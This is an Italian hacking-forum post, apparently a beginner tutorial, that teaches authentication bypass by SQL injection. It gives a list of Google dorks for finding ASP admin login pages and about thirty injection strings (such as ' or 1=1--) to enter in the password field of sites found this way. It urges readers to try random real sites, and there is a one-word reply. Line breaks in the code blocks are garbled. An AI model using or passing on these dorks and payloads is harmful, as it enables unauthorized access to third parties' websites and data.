SQL Injector + Dorks
× Accedi al tuo account

Hai perso la password?
Registrati adesso è GRATUITO

Appena entrato avrai:
Norton Safe Web Connessione HTTPS Sicura

Registrati Adesso!

Menu
NAV
Pubblicità

BETA
Tag: Injector, Dorks,
Valutazione discussione:
  • 0 voto(i) - 0 media
  • 1
  • 2
  • 3
  • 4
  • 5

SQL Injector + Dorks

19/07/2014, 22:54
Tutorial 
1459 Visualizzazioni

In informatica la SQL injection è una tecnica dell'hacking mirata a colpire le applicazioni web che si appoggiano su un database di tipo SQL. Questo exploit sfrutta l'inefficienza dei controlli sui dati ricevuti in input ed inserisce codice maligno all'interno di una query SQL. Le conseguenze prodotte sono imprevedibili per il programmatore: l'SQL injection permette al malintenzionato di autenticarsi con ampi privilegi in aree protette del sito anche senza essere in possesso delle credenziali d'accesso e di visualizzare e/o alterare dati sensibili.
| da Wikipedia

La sensibilità avviene in un codice del tipo:

Codice PHP:
<form action='login.php' method='post'>
Username: <input type='text' name='user' />
Password: <input type='password' name='pwd' />
<
input type='submit' value='Login' />
</
form

Naturalmente,potremmo visualizzare l'HTML del form di Login di un sito,oppure possiamo hackare molti siti sensibili,la maggior parte di essi implementa un linguaggio in .asp di conseguenza possiamo fare così

Scriviamo su Google uno di questi Dork:

Codice PHP:
inurl:adminlogin.asp

inurl
:admin_login.asp

inurl
:adminlogon.asp

inurl
:admin_logon.asp

inurl
:/admin.asp

inurl
:/login.asp

inurl
:/logon.asp

inurl
:/adminlogin.asp

inurl
:/adminlogon.asp

inurl
:/admin_login.asp

inurl
:/admin_logon.asp

inurl
:/admin/admin.asp

inurl
:/admin/login.asp

inurl
:/admin/logon.asp

inurl
:/admin/adminlogin.asp

inurl
:/admin/adminlogon.asp

inurl
:/admin/admin_login.asp

inurl
:/admin/admin_logon.asp

inurl
:/administrator/admin.asp

inurl
:/administrator/login.asp

inurl
:/administrator/logon.asp

inurl
:root/login.asp

inurl
:admin/index.asp 
-------------------------------------------------------------------------------------------------------------------
Clicchiamo su un sito (naturalmente esistono anche persone normali che proteggono il codice,di conseguenza non vi abbattete al primo tentativo) e nel form inseriamo queste informazioni.

Nella TextBox dove inserire l'ID dell'Administrator scrivete quello che trovate tra le virgolette: "admin"
Nella TextBox dove inserire la Password dell'admin scrivete una delle seguenti stringhe:

Codice PHP:
admin'--

1'
or'1'='1

or 0=--

" or 0=0 --

or 0=0 --

' or 0=0 #

or 0=#

or 0=#

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi
" or "a"="a

hi
" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi"
) or ("a"="a

1' OR '1'='1 

FONTE: Web



Rispondi

#MarshMallouJ~
Utente Medio
50
Utente Genio
****
5.00C
07/2017
2
35
Utente Genio
Messaggio: #2
Tutorial SQL Injector + Dorks
25/02/2018, 23:56


interessante

Rispondi


Aggiorna il tuo account per nascondere gli annunci pubblicitari.




Utenti che stanno guardando questa discussione: 1 Ospite(i)